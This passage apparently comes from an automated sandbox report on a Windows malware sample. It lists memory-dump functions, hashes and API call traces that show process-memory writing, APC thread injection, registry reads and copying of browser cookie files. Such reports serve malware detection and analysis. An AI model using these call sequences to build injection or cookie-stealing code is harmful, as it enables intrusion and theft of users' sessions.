  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CD171, Relevance: 9.1, APIs: 6, Instructions: 67 Total matches: 31thread
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3D4D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 38registry
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF422, Relevance: 10.6, APIs: 7, Instructions: 85 Total matches: 37registrylibraryloader
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
